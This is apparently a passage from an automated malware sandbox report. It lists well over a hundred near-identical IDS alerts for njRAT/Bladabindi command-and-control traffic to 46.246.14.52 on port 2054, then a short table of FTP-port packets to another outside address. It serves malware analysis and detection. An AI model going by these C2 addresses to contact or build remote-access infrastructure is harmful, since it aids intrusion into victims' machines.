                                                            2024-09-24T23:43:28.528027+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.533513+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.594349+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.604145+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.710877+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.717516+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.759578+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.764481+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.783239+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.788142+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.799137+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.803986+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.809192+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.814040+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.819026+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.827339+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.832212+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.837105+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.846874+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.851786+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.857542+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.862461+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.867519+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.872424+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.877351+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.882331+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.887407+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.892222+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.897183+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.903094+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.907995+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.912929+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.922512+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.927408+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.932640+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.937535+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.942495+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.947467+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.952492+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.960206+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.965153+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.974040+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.979034+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.983941+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.990473+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:28.995400+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.019599+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.024470+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.030352+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.035210+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.040305+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.045233+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.050242+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.056778+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.061704+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.066944+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.071770+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.077268+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.084949+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.089881+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.094780+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.099687+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.104722+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.111648+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.116486+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.121361+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.126408+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.131320+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.138391+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.143468+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.148521+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.153558+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.159422+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.164473+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.171923+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.178235+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.183239+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.188057+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.192942+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.197816+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.206278+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.211298+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.216415+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.222769+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.227690+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.234508+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.239434+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.244394+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.253771+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.261440+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.271520+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.276556+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.296602+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.301512+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.336453+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.365146+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.374403+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.379547+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.385443+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.411311+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.416290+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.421134+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.426067+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.431122+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.436029+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.440890+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.446154+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.451136+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.456217+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.462761+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.467772+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.472832+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.477695+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.482599+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.488589+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.493429+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.498333+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.503224+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.510389+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.516863+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.521699+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.526568+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.531410+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.538302+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.544650+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.551451+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.558176+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.563156+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.568017+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.574246+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.579413+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.584766+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.589663+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.612118+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.616991+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.621931+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.629480+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.634321+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.641756+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.646624+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.654255+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.659347+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.664384+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.696786+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.701969+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.706950+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.712803+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.717756+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.723112+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.728150+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.733043+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.737966+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.745380+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.750254+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.755086+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.759944+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.764884+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.770175+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.775157+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.795804+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.802249+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.834732+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.847551+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.891818+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.901106+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.930283+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.935245+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.940260+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.945085+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.949996+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.978200+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:29.993522+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:30.000208+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:30.005502+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:30.011799+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:30.017105+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:30.022324+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:30.027880+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:30.058638+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            2024-09-24T23:43:30.537958+02002825564ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)1192.168.2.55614546.246.14.52054TCP
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Sep 24, 2024 23:42:03.633469105 CEST4970421192.168.2.5191.252.83.213
                                                            Sep 24, 2024 23:42:03.638364077 CEST2149704191.252.83.213192.168.2.5
                                                            Sep 24, 2024 23:42:03.638443947 CEST4970421192.168.2.5191.252.83.213
                                                            Sep 24, 2024 23:42:04.252587080 CEST2149704191.252.83.213192.168.2.5
                                                            Sep 24, 2024 23:42:04.253403902 CEST4970421192.168.2.5191.252.83.213
                                                            Sep 24, 2024 23:42:04.258236885 CEST2149704191.252.83.213192.168.2.5
                                                            Sep 24, 2024 23:42:04.474591017 CEST2149704191.252.83.213192.168.2.5
                                                            Sep 24, 2024 23:42:04.474827051 CEST4970421192.168.2.5191.252.83.213
                                                            Sep 24, 2024 23:42:04.479707003 CEST2149704191.252.83.213192.168.2.5
                                                            Sep 24, 2024 23:42:04.705015898 CEST2149704191.252.83.213192.168.2.5
                                                            Sep 24, 2024 23:42:04.705259085 CEST4970421192.168.2.5191.252.83.213
                                                            Sep 24, 2024 23:42:04.710114956 CEST2149704191.252.83.213192.168.2.5
                                                            Sep 24, 2024 23:42:04.925755978 CEST2149704191.252.83.213192.168.2.5
                                                            Sep 24, 2024 23:42:04.925973892 CEST4970421192.168.2.5191.252.83.213
                                                            Sep 24, 2024 23:42:04.931338072 CEST2149704191.252.83.213192.168.2.5
                                                            Sep 24, 2024 23:42:05.146946907 CEST2149704191.252.83.213192.168.2.5
                                                            Sep 24, 2024 23:42:05.147140980 CEST4970421192.168.2.5191.252.83.213
                                                            Sep 24, 2024 23:42:05.151886940 CEST2149704191.252.83.213192.168.2.5
                                                            Sep 24, 2024 23:42:05.369565964 CEST2149704191.252.83.213192.168.2.5
                                                            Sep 24, 2024 23:42:05.369791031 CEST4970421192.168.2.5191.252.83.213
